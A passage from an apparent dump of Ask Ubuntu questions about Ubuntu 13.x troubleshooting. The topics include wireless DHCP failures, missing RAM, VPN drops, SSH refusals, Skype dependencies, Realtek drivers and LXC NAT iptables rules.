24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] oct 24 09:01:13 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1/wireless ) : connection 'telenet-ee09a ' has security , and secrets exist . no new secrets needed . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : added 'ssid ' value 'telenet-ee09a' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : added 'scan_ssid ' value '1' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : added 'key_mgmt ' value 'wpa-psk' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : added 'auth_alg ' value 'open' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : added 'psk ' value '' oct 24 09:01:13 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 2 of 5 ( device configure ) complete . oct 24 09:01:13 guzumi networkmanager [ 1008 ] : config : set interface ap_scan to 1 oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : disconnected - > scanning oct 24 09:01:13 guzumi wpa_supplicant [ 1030 ] : eth1 : trying to associate with 5c:35:3b:5e : e0:9f ( ssid='telenet-ee09a ' freq=2417 mhz ) oct 24 09:01:13 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : scanning - > associating oct 24 09:01:13 guzumi wpa_supplicant [ 1030 ] : eth1 : ctrl-event-assoc-reject status_code=16 oct 24 09:01:23 guzumi wpa_supplicant [ 1030 ] : eth1 : authentication with 5c:35:3b:5e : e0:9f timed out . oct 24 09:01:23 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : associating - > disconnected oct 24 09:01:24 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : disconnected - > scanning oct 24 09:01:25 guzumi wpa_supplicant [ 1030 ] : eth1 : trying to associate with 5c:35:3b:5e : e0:9f ( ssid='telenet-ee09a ' freq=2417 mhz ) oct 24 09:01:25 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : scanning - > associating oct 24 09:01:25 guzumi wpa_supplicant [ 1030 ] : eth1 : associated with 5c:35:3b:5e : e0:9f oct 24 09:01:25 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : associating - > 4-way handshake oct 24 09:01:25 guzumi wpa_supplicant [ 1030 ] : eth1 : wpa : key negotiation completed with 5c:35:3b:5e : e0:9f [ ptk=ccmp gtk=tkip ] oct 24 09:01:25 guzumi wpa_supplicant [ 1030 ] : eth1 : ctrl-event-connected - connection to 5c:35:3b:5e : e0:9f completed ( reauth ) [ id=0 id_str= ] oct 24 09:01:25 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : 4-way handshake - > completed oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'telenet-ee09a ' . oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... oct 24 09:01:25 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] oct 24 09:01:25 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) oct 24 09:01:25 guzumi networkmanager [ 1008 ] : dhclient started with pid 4812 oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1 ) beginning ip6 addrconf . oct 24 09:01:25 guzumi avahi-daemon [ 986 ] : withdrawing address record for fe80 : :c2cb:38ff : fe81:85f8 on eth1 . oct 24 09:01:25 guzumi avahi-daemon [ 986 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :c2cb:38ff : fe81:85f8 . oct 24 09:01:25 guzumi avahi-daemon [ 986 ] : interface eth1.ipv6 no longer relevant for mdns . oct 24 09:01:25 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . oct 24 09:01:25 guzumi dhclient : internet systems consortium dhcp client 4.2.4 oct 24 09:01:25 guzumi dhclient : copyright 2004-2012 internet systems consortium . oct 24 09:01:25 guzumi dhclient : all rights reserved . oct 24 09:01:25 guzumi dhclient : for info , please visit https : //www.isc.org/software/dhcp/ oct 24 09:01:25 guzumi dhclient : oct 24 09:01:25 guzumi networkmanager [ 1008 ] : ( eth1 ) : dhcpv4 state changed nbi - > preinit oct 24 09:01:25 guzumi dhclient : listening on lpf/eth1/c0 : cb:38:81:85 : f8 oct 24 09:01:25 guzumi dhclient : sending on lpf/eth1/c0 : cb:38:81:85 : f8 oct 24 09:01:25 guzumi dhclient : sending on socket/fallback oct 24 09:01:25 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 ( xid=0x1efe537b ) oct 24 09:01:27 guzumi avahi-daemon [ 986 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :c2cb:38ff : fe81:85f8 . oct 24 09:01:27 guzumi avahi-daemon [ 986 ] : new relevant interface eth1.ipv6 for mdns . oct 24 09:01:27 guzumi avahi-daemon [ 986 ] : registering new address record for fe80 : :c2cb:38ff : fe81:85f8 on eth1.* . oct 24 09:01:28 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 5 ( xid=0x1efe537b ) oct 24 09:01:33 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 5 ( xid=0x1efe537b ) oct 24 09:01:38 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 8 ( xid=0x1efe537b ) oct 24 09:01:45 guzumi networkmanager [ 1008 ] : ( eth1 ) : ip6 addrconf timed out or failed . oct 24 09:01:45 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... oct 24 09:01:45 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) started ... oct 24 09:01:45 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) complete . oct 24 09:01:46 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 10 ( xid=0x1efe537b ) oct 24 09:01:56 guzumi dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 14 ( xid=0x1efe537b ) oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : dhcpv4 request timed out . oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : canceled dhcp transaction , dhcp client pid 4812 oct 24 09:02:10 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... oct 24 09:02:10 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) started ... oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] oct 24 09:02:10 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:02:10 guzumi networkmanager [ 1008 ] : activation ( eth1 ) failed for connection 'telenet-ee09a' oct 24 09:02:10 guzumi networkmanager [ 1008 ] : activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) complete . oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] oct 24 09:02:10 guzumi avahi-daemon [ 986 ] : withdrawing address record for fe80 : :c2cb:38ff : fe81:85f8 on eth1 . oct 24 09:02:10 guzumi avahi-daemon [ 986 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :c2cb:38ff : fe81:85f8 . oct 24 09:02:10 guzumi avahi-daemon [ 986 ] : interface eth1.ipv6 no longer relevant for mdns . oct 24 09:02:10 guzumi networkmanager [ 1008 ] : unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 24 09:02:10 guzumi wpa_supplicant [ 1030 ] : eth1 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 oct 24 09:02:10 guzumi networkmanager [ 1008 ] : ( eth1 ) : supplicant interface state : completed - > disconnected oct 24 09:02:10 guzumi kernel : [ 1509.067650 ] cfg80211 : calling crda to update world regulatory domain oct 24 09:02:10 guzumi kernel : [ 1509.075711 ] cfg80211 : world regulatory domain updated : oct 24 09:02:10 guzumi kernel : [ 1509.075721 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) oct 24 09:02:10 guzumi kernel : [ 1509.075729 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 24 09:02:10 guzumi kernel : [ 1509.075736 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 24 09:02:10 guzumi kernel : [ 1509.075742 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 24 09:02:10 guzumi kernel : [ 1509.075748 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 24 09:02:10 guzumi kernel : [ 1509.075755 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) i followed the suggestions to ensure all packages are up-to-date reboot deleting the networkmanager `` telenet-ee09a '' network record and connecting again . however , this failed . at the same time , other machines ( my dual boot windows and my ipad ) can still join the wireless telenet-ee09a network easily . so there seems to be a mismatch between my new ubuntu 13.10 and the specifics to this particular router or wireless network type ( s ) . does anyone have an idea ? jan
364901	64-bit 13.10 shows 1gb less ram than 64-bit 13.04 did	multiple 64-bit versions ( kubuntu , lubuntu and xubuntu ) once installed on my thinkpad r60 show 3gb of ram , not the correct 4gb of ram . last week with 13.04 , i had 4gb of ram ( which matches the bios ) and this week i have 3gb available . inquiring minds want to know . details follow : linux r60 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux r60 free -m reports : _ total used free shared buffers cached mem : 3001 854 2146 0 22 486 -/+ buffers/cache : 346 2655 swap : 0 0 0 . . . . . . lshw shows : description : notebook product : 9459at8 ( ) vendor : lenovo version : thinkpad r60/r60i serial : redacted width : 64 bits capabilities : smbios-2.4 dmi-2.4 vsyscall32 configuration : administrator_password=disabled boot=normal chassis=notebook family=thinkpad r60/r60i frontpanel_password=unknown keyboard_password=disabled power-on_password=disabled uuid=126e4001-48ca-11cb-9d53-b982ae0d1abb *-core description : motherboard product : 9459at8 vendor : lenovo physical id : 0 version : not available *-firmware description : bios vendor : lenovo physical id : 0 version : 7cetc1ww ( 2.11 ) date : 01/09/2007 size : 144kib capacity : 1984kib capabilities : pci pcmcia pnp upgrade shadowing escd cdboot bootselect socketedrom edd acpi usb biosbootspecification { snip } *-memory description : system memory physical id : 29 slot : system board or motherboard size : 4gib *-bank:0 description : sodimm ddr2 synchronous physical id : 0 slot : dimm 1 size : 2gib width : 64 bits *-bank:1 description : sodimm ddr2 synchronous physical id : 1 slot : dimm 2 size : 2gib width : 64 bits dpkg -l linux-* returns : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-======================================-=======================================-========================================================================== un linux-doc-3.2.0 < none > ( no description available ) ii linux-firmware 1.79.6 firmware for linux kernel drivers ii linux-generic 3.2.0.52.62 complete generic linux kernel un linux-headers < none > ( no description available ) un linux-headers-3 < none > ( no description available ) un linux-headers-3.0 < none > ( no description available ) un linux-headers-3.2.0-23 < none > ( no description available ) un linux-headers-3.2.0-23-generic < none > ( no description available ) ii linux-headers-3.2.0-52 3.2.0-52.78 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-52-generic 3.2.0-52.78 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-generic 3.2.0.52.62 generic linux kernel headers un linux-image < none > ( no description available ) un linux-image-3.0 < none > ( no description available ) ii linux-image-3.2.0-52-generic 3.2.0-52.78 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.52.62 generic linux kernel image un linux-initramfs-tool < none > ( no description available ) un linux-kernel-headers < none > ( no description available ) un linux-kernel-log-daemon < none > ( no description available ) ii linux-libc-dev 3.2.0-52.78 linux kernel headers for development un linux-restricted-common < none > ( no description available ) ii linux-sound-base 1.0.25+dfsg-0ubuntu1.1 base package for alsa and oss sound systems un linux-source-3.2.0 < none > ( no description available ) un linux-tools < none > ( no description available )
364906	l2tp vpn not working in 13.10 , what other tools can i use ?	since i upgraded to 13.10 , this is a problem : from firewall side , the connection is a success , then dropped by the guest . so , what other options are there , that actually work in 13.10 ? oct 24 08:18:02.428 xl2tpd [ 30130 ] : `` file '' oct 24 08:18:02.428 xl2tpd [ 30130 ] : `` /etc/ppp/valhall.options.xl2tpd '' oct 24 08:18:02.431 xl2tpd [ 30130 ] : `` ipparam '' oct 24 08:18:02.432 xl2tpd [ 30130 ] : `` x.x.x.199 '' oct 24 08:18:02.432 xl2tpd [ 30130 ] : `` /dev/pts/2 '' oct 24 08:18:02.436 pppd [ 30191 ] : plugin passprompt.so loaded . oct 24 08:18:02.437 pppd [ 30191 ] : pppd 2.4.5 started by root , uid 0 oct 24 08:18:02.437 pppd [ 30191 ] : using interface ppp0 oct 24 08:18:02.438 pppd [ 30191 ] : connect : ppp0 < -- > /dev/pts/2 oct 24 08:18:05.600 pppd [ 30191 ] : deflate ( 15 ) compression enabled oct 24 08:18:05.655 pppd [ 30191 ] : local ip address x.x.x.x oct 24 08:18:05.655 pppd [ 30191 ] : remote ip address x.x.x.x oct 24 08:18:05.655 pppd [ 30191 ] : primary dns address x.x.x.x oct 24 08:18:05.656 pppd [ 30191 ] : secondary dns address x.x.x.x oct 24 08:18:05.662 pppd [ 30191 ] : ipcp terminated by peer ( unauthorized remote ip address ) oct 24 08:18:05.663 pppd [ 30191 ] : connect time 0.0 minutes . oct 24 08:18:05.663 pppd [ 30191 ] : sent 0 bytes , received 34 bytes . oct 24 08:18:05.729 pppd [ 30191 ] : lcp terminated by peer ( no network protocols running ) oct 24 08:18:05.951 xl2tpd [ 30130 ] : control_finish : connection closed to x.x.x.199 , serial 1 ( ) oct 24 08:18:05.951 xl2tpd [ 30130 ] : terminating pppd : sending term signal to pid 30191 oct 24 08:18:05.952 pppd [ 30191 ] : modem hangup oct 24 08:18:05.952 pppd [ 30191 ] : connection terminated . oct 24 08:18:05.985 pppd [ 30191 ] : terminating on signal 15 oct 24 08:18:05.986 pppd [ 30191 ] : exit . oct 24 08:19:07.365 xl2tpd [ 30130 ] : maximum retries exceeded for tunnel 4797 . closing . oct 24 08:19:07.367 [ error 410 ] connection attempt to 'valhall ' timed out oct 24 08:19:07.367 xl2tpd [ 30130 ] : connection 27 closed to x.x.x.199 , port 1701 ( timeout ) oct 24 08:19:12.370 xl2tpd [ 30130 ] : unable to deliver closing message for tunnel 4797 . destroying anyway .
364907	why wo n't videos on a particular website play under ubuntu 13.04 ?	very oddly , i can not watch any videos a tv channel website , for example this one : http : //www.kanald.com.tr/galipdervis/videolar/ i can see from the frame source that it contains an embedded adobe flash video and some java scripts ( all of which do n't pose any problems elsewhere ) . i 've tried different web browsers ( chrome/chromium/firefox ) , but it seems i have some sort of video codec problem in my system . i have installed all sorts of gstreamer plugins , codecs , etc . ( maybe too many ? ) to avoid such problems , but strangely i can watch these videos using linux mint 15 live session on the same machine . i wonder how i can find out why a particular video ( like this one ) wo n't work on my system ?
364909	high contrast inverse on ubuntu 13.10 ?	since i upgraded to ubuntu 13.04 and later to 13.10 , i do n't find anymore the theme `` high contrast inverse '' in the list of themes . still , i prefer a theme which has ( i ) a high contrast and ( ii ) has bright fonts on a dark background ( e.g . white on black ) . searching the net still finds `` high contrast inverse '' theme references , but it is unclear to me how to install them on my ubuntu 13.x . jan
364912	lubuntu 12.04 – ltsp – speed of clients	server : fujitsu siemens rx200 s4 - quadcore , 8 gb ram , 250 gb sata , 2 x gbyte lan clients : fujitsu siemens futro s400 ( 1 ghz goede , 256 or 512 mb ram ) or hp t510 ( viaeden x2 u4200 , 2 gb ram , gbyte lan ) or ( for testing ) igel 5/4 4210 lx ( via c7 1ghz , 1 gb ram , fast ethernet ) lan : gbyte ( all switches too ) - server with 2 nic ( = > all clients within a separate gbyte lan ) os on server : lubuntu 12.04 lts 64 bit & ltsp 5.3.7-0 ubuntu2.6 - ltsp clients build with -- arch i368 situation : os , ltsp and virtualbox with windows xp on the server working fine and as fast as it should be with a quadcore . e.g . winxp in virtualbox is nearly as fast as on a 1 ghz single-core desktop . ram and cpu usage low or moderate - even with 2 or 3 clients working . clients booting without problems . screen resolution on clients 1280x1024 . programs like libre office , midori or chrome starting with sufficient speed . from my `` feeling '' there is nearly no difference between the clients . problem ( s ) : scrolling within webpages ( e.g . ebay ) is smooth and fast on the server - on the clients midori is a little bit faster than chrome but both are not as fast/smooth as on the server . and there is no difference to be seen to my productive environment i have now - a dualcore fujitsu siemens desktop as server and the same clients / os and software setup . my goal was and is to replace this dualcore `` server '' with the above mentioned solution - that should be `` a little bit '' faster ... winxp in virtual box is much slower than on the server ... so seen everything together the speed this solution provides is n't acceptable for the users and seems to be no improvement compared to the current solution . from my point of view it is interesting that there is no remarkable difference between the futro 's and the hp 's . even the igel ( with an 100mps lan ) seems to be not remarkable slower . so the problems seem to be not on the lan-side . what i did is , i `` played '' with e.g . with the bios-settings of the clients and the ltsp config on the server - no improvements ... what i recognized is , that the scrolling becomes smoother and faster the lower the screen resolution on the clients is – 800x600 smooth and fast – 1024x768 not so smooth and fast but better as 1280x1024 ( and this is the resolution i need ! ) ... my strong feeling is , that the solution is `` on the server '' within the os ( or the chroot for the clients ) - but where ? ? ? ? if it is a question of the video data transferred from the server to the clients my questions would be : where is the screen i see on the clients generated ? on the server ? does this mean , the server needs a more powerfull graphic card ? or more ram for graphic ? or is it „generated“ on the clients ? but allocating more video ram within the bios of the clients has had no effect – i tried this already . could it be that it has something to do with the cpu 's of the clients ? the hp is a via 64 bit and the futro a goede 32bit / the igel a via 32bit . as far as i read ubuntu since 10.10 / kernel > 2.3.x does not support these „old“ cpu 's . but i tried to install a 10.04 and it automatically had a kernel 2.6.x … and there was no visible difference to be seen . so i 'm really at a loss and would be thankfull for any hint and help . best regards christian
364914	moving grub from one disk to another	i have 13.04 installed on my hard drive in my laptop , i now also have 13.10 on an ssd in the same machine . at the moment to boot 13.10 i have to set in bios to boot my hard drive ( which is not the disk 13.10 is on ) which i guess launches grub from my hd and then i can select to launch ubuntu ( which launches 13.10 ) or ubuntu 13.04 - both work . my question is - how do i move grub from the hd to the ssd so in future if my hd fails my instal wo n't ? i do n't really need the 13.04 install to keep working although it would be handy . many thanks .
364916	ubuntu forces my screen to 50 fps	system : ubuntu 13.10 kernel : 3.11 cpu : amd phenom ii 1055t 2.8 ghz gpu : nvidia gts 250 ( drivers are 331 ) screen : samasung sa350 22 inch led ( 60hz ) ram : 4gb after nvidia driver update ( all versions are the same ) now my screen works at 50 fps i used benchmark tool in ccsm to figure it out i have to change it manually every time i reboot through composite in ccsm also . is there a way to automate this processes ? i have another question how can i make the numlock key to stay activated when booting ? because i have to turn it on every time i boot
364917	directory still showing disk usage after deletion	i have a curious situation where i 've just deleted a large number of files from a directory , however , the directory info and a du -h still reports it to have a large amount of data in it . vmscan02 : /var/tempdir/xml $ du -h 33m ./match 4.0k ./archive 75m ./lineup 29m ./team 407m ./playerlist 35m ./player 1.9m ./league 579m . vmscan02 : /var/tempdir/xml $ but changing into each directory and running ls -la reveals nothing in the directory . how can i update the size reporting ?
364919	how can i restore a country specific apt-get update mirror ?	while configuring my new 13.10 installation , i chose to change the default update server using the `` software & updates '' gui tool available in the system settings panel . before this change the selected update server was `` server for italy '' ( i live there ) . now it 's one of the mirrors available in the list of mirrors ( one of italian ones ) . how is `` server for country '' chosen in the list of mirrors for a country ? how can i restore the `` server for italy '' option ? is it advisable to do so ? i want to revert that setting because i found that the selected mirror is not up to date ( checked from here ) .
364921	opening a file from terminal only by typing its name	i know that xdg-open will open from terminal a file in the user 's preferred application like this : xdg-open filename but i wonder how can i open a file from the current directory in its default application only by typing : filename followed by enter , of course . nothing more .
364923	127.0.0.1:9051 doesnt work after apache , mysql , php installation ?	i have installed apache2 , mysql , and php and now it does n't let vidalia run on localhost . i tried to change the tcp connection ( controlport ) to any other ip 192.168.0.40 and tried to change the default port 9051 to any other but that does n't work . i thought apache is running so i used this command sudo service apache2 stop but that still does n't work . so now when i type 127.0.0.1:9051 in browser it says and if i type only type 127.0.0.1 after stopping the apapche2 service with the command mentioned above it says unable to connect i am not sure what to do now .
364935	ping works , but unable to do ssh	i disabled the firewall with sudo ufw disable , i can ping the server , the server can ping me but i ca n't ssh to it : root @ ubuntu : /home/acme # ssh 192.168.1.6 ssh : connect to host 192.168.1.6 port 22 : connection refused i removed ssh and reinstalled : sudo apt-get remove openssh-client openssh-server sudo apt-get install openssh-client openssh-server but still ssh is not working and i get the error connection refused how do i tackle this issue ? here are some other stuff i have tried so far : root @ ubuntu : /home/acme # sudo service ssh start start : job is already running : ssh root @ ubuntu : /home/acme # ps aux | grep ssh acme 6548 0.0 0.0 12576 320 ? ss 04:09 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session gnome-session -- session=ubuntu root 22219 0.0 0.1 50040 2852 ? ss 05:10 0:00 /usr/sbin/sshd -d root 22277 0.0 0.0 8116 896 pts/0 s+ 05:17 0:00 grep -- color=auto ssh update for future visitors removing and reinstalling ssh on the server worked for me : sudo apt-get remove openssh-client openssh-server sudo apt-get install openssh-client openssh-server
364943	how do i remove youtube from the volume indicator ?	i 've recently installed ubuntu 13.10 , and was n't aware of this web integration service . so when i visited youtube in firefox , and it asked me to install something to make it easier , some youtube service , i did . and since then , i have a youtube option to control in my volume applet in the panel along with rhythmbox . how can i remove the youtube from my volume ? thanks a lot !
364946	unmount script running on unmounted device	how can i unmount a usb drive using a script located on that drive ? the device appears busy when the script is running ,
364948	ubuntu server and services	i 've been using linux+plesk virtual server as a web server for a while , but i want to give a try on doing it manually , so my question is : i 'll have a server which is : 80gb hdd , 4gb ram , 1tb bandwith , 1 dedicated ip . and i use the following things on my virtual nowadays : mail server dns server apache + php 5.5 + mysql ftp ssh my question is , without plesk , can i achieve manually all those functionalities -know that i am not a terminal pro- , actually upgrading some of them to look like that with ubuntu server ? : mail server ( with a nice webmail included ) dns server nginx + php 5.5 + mysql + mongodb ftp + sftp ssh git server which ubuntu server should i chose ? [ edit ] i almost forgot , i 'd like to know how much bandwith and cpu is using each of my webapps ( one per domain usually ) , and the overall ( not just from the webapps , but also mail , dns , etc ... ) ... usually plesk does that for me , and i do n't know how to measure that without it !
364952	offline upgrade to kubuntu 13.10	i do not have access to reliable internet access at home , but can get access to decent internet now and then . given that there are no alternate cds being produced , what 's the best way to do an offline upgrade to kubuntu 13.10 ? ( the machine that i can get internet access on is a windows box ... boo . )
364953	how can i restore /usr/share/fonts on 10.04 ?	i did something extremely stupid . i 'm currently working on a 10.04 system ( work-related ) , and since i was missing some fonts i decided to simply copy some over from my own , 12.10 system . i ran cp -r < 12.10 root > /usr/share/fonts/truetype/* /usr/share/fonts/truetype/ immediately , terminal and window header fonts got completely messed up , although chromium still shows everything correctly , as does nautilus . how can i restore this directory ? is there anything else i have do afterwards ?
364954	do `` personal fstab '' files exist for user accounts ?	i 'm looking for a `` personal '' equivalent for the /etc/fstab file , that apply only on my account ( on login ) ; does such a file exists ? or is it more complicated ?
364958	restore old desktop	my ubuntu desktop display system has been crashed after automated updates via update manager . how can restore my old version of ubuntu desktop ?
364961	smart and raid on linux	i am about to move some of my small company services to ubuntu while still learning it . i 'm also about to buy a hardware raid , and a guy reviewing an ibm/lsi controller in this article said , that does n't passthru smart info to os and it needs to do it for linux servers . since i have a real bargain for ibm serveraid m1015 or ibm serveraid m5015 at the moment , i need to know why lack of smart passthru is an issue here ?
364962	p2pool server - setting up a p2pool server - bitcoin	i need to install a p2pool server , would you have anyone that know how to do it ? i 'm having a few technical difficulties setting it up , i 'm a bit rusty .
364966	how do i integrate gnome applications properly in xfce ?	recently i 've installed xfce . i had used xubuntu some time ago and wanted to install it again because of the more extensive possibilities to configurate it . however , now i have one problem : some gnome applications do not use the xfce-theme . on that screenshot you can see that the window on the right is apparently not using the xfce-theme : what could be wrong ?
364967	how do i get adobe reader to print more than one page in 13.10 saucy ?	on my fresh saucy install ( 64-bit ) , acroread ( 9.5.5 ) only prints one page out of any pdf file . setting file > print > advanced > font and resource policy to send for each page did not help . /var/log/cups/error_log contains no errors . evince prints the same pdf files fine . when i print to a ps file in acroread , the file opens fine in evince and contains all of the pages . any ideas ?
364968	installing skype in ubuntu 13.10	when upgrading ubuntu 13.04 to ubuntu 13.10 ( 64 bit ) , the upgrade tool insisted on removing skype . i 'm now trying to get skype reinstalled . when trying from the software center ( as suggested by why does n't skype start ? ) , i get a dependency problem : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . so let 's try apt-get as usual : janr @ guzumi : ~ $ sudo apt-get install skype reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : ia32-libs ( > = 20080808 ) but it is not installable depends : lib32asound2 ( > 1.0.22 ) but it is not installable e : unable to correct problems , you have held broken packages . it seems ia32-libs was removed from ubuntu . installing with `` apt-get install skype : i386 '' works , but then i get a segmentation fault when starting skype . as my system is 64 bit , i removed skype : i386 again . moreover , janr @ guzumi : ~ $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32asound2 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate i found another page ( http : //www.webupd8.org/2013/10/get-sound-working-in-skype-with-ubuntu.html ) saying i should really try to use skype from the ubuntu version , as it has a fix for the sound library which is not present in the version offered by skype itself . so i refrain for now from trying that .
364971	text and lines jamming after installing some font packages !	i tried to install some packages related to fonts on ubuntu and now the texts in browsers are jammed and into each other . like this :
364972	realtek 8188cus does n't work	i 'm new to ubuntu , very new , and does n't really know if what i 'm doing is correct . installed ubuntu 13.10 5 days ago , my tplink tl-wn723n wifi usb adapter connects to the wifi router but keeps asking for the password , searched google and found out it 's a bug , my tplink is version 2 so that means it has rtl8188cus . so far , what i 've tried are : blacklisting certain modules , i 'm not sure if i did it correctly , went to terminal , typed : sudo su then typed my password typed : sudo nano /etc/modprobe.d/blacklist.conf added blacklist native realtek 8188cus drivers blacklist rtl8192c blacklist rtl8192c_common blacklist rtlwifi pressed ctrl+x , when asked if i want to save , pressed `` y '' , and when asked what file name , just pressed enter with blacklist.conf downloaded the driver from realtek , for 8188cus , extracted it , then ran sudo bash install.sh after restarting , i dont get wifi on my network anymore . i also tried doing the rtl8192cu-tjp-dkms_1.6_all made by tim , at some point , i was able to install this , but now , when i try to , it wont , it would say dependency is not satisfiable : dkms ( > =1.95 please help , i may need noob instructions todo this thanks
364974	ubuntu 12.04 lxc nat prerouting not working	i have a running debian wheezy setup i copied exactly to an ubuntu 12.04 ( elementary os , used as desktop as well ) while the debian setup runs flawlessly , the ubuntu version dies on the prerouting to containers ( or so it seems ) in short : lxc works containers work and run connecting to container from host ok ( including mixed ports & services ) connecting to outside world from container is fine what does not work is connecting from another box to the host on a port that should be nated to a container . the setups : /etc/rc.local cmd_brctl=/sbin/brctl cmd_ifconfig=/sbin/ifconfig cmd_iptables=/sbin/iptables cmd_route=/sbin/route network_bridge_device_nat=lxc-bridge host_netdevice=eth0 private_gw_nat=192.168.42.1 private_netmask=255.255.255.0 public_ip=192.168.13.100 $ { cmd_brctl } addbr $ { network_bridge_device_nat } $ { cmd_brctl } setfd $ { network_bridge_device_nat } 0 $ { cmd_ifconfig } $ { network_bridge_device_nat } $ { private_gw_nat } netmask $ { private_netmask } promisc up therefore lxc network is 192.168.42.0/24 and the host eth0 ip is 192.168.13.100 ; setup via network manager as static address . iptables : *mangle : prerouting accept [ 0:0 ] : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] : postrouting accept [ 0:0 ] commit *filter : forward accept [ 0:0 ] : input drop [ 0:0 ] : output accept [ 0:0 ] # accept traffic from internal interfaces -a input -i lo -j accept # accept traffic from lxc network -a input -d 192.168.42.1 -s 192.168.42.0/24 -j accept # accept internal traffic make sure new incoming tcp connections are syn # packets ; otherwise we need to drop them : -a input -p tcp ! -- syn -m state -- state new -j drop # packets with incoming fragments drop them . this attack result into linux server panic such data loss . -a input -f -j drop # incoming malformed xmas packets drop them : -a input -p tcp -- tcp-flags all all -j drop # incoming malformed null packets : -a input -p tcp -- tcp-flags all none -j drop # 